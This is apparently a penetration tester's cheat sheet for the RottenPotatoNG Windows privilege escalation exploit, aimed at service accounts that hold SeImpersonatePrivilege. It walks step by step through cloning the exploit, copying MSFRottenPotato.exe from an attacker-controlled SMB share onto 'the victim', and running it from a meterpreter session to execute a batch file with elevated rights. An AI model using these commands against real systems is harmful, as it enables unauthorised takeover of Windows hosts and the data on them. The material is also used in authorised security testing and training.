RottenPotatoNG

Windows privilege escalation technique.

Use when winPEAS or “whoami /priv” says the the account has “SeImpersonatePrivilege” or equivalent. Usually includes many service accounts in Windows such as the IIS and SQL Server accounts.

Download RottenPotatoNG

Code for RottenPotato is no longer maintained. Use newer implementation RottenPotatoNG (GitHub) instead.

git clone https://github.com/breenmachine/RottenPotatoNG.git

Upload file to the victim

Use Impacket smbserver.

copy \\x.x.x.x\myshare\RottenPotatoNG\RottenPotatoEXE\x64\Release\MSFRottenPotato.exe C:\<some path on victim>\MSFRottenPotato.exe

Execute the exploit

After having a meterpreter shell with incognito mode loaded:

MSFRottenPotato.exe t c:\windows\temp\test.bat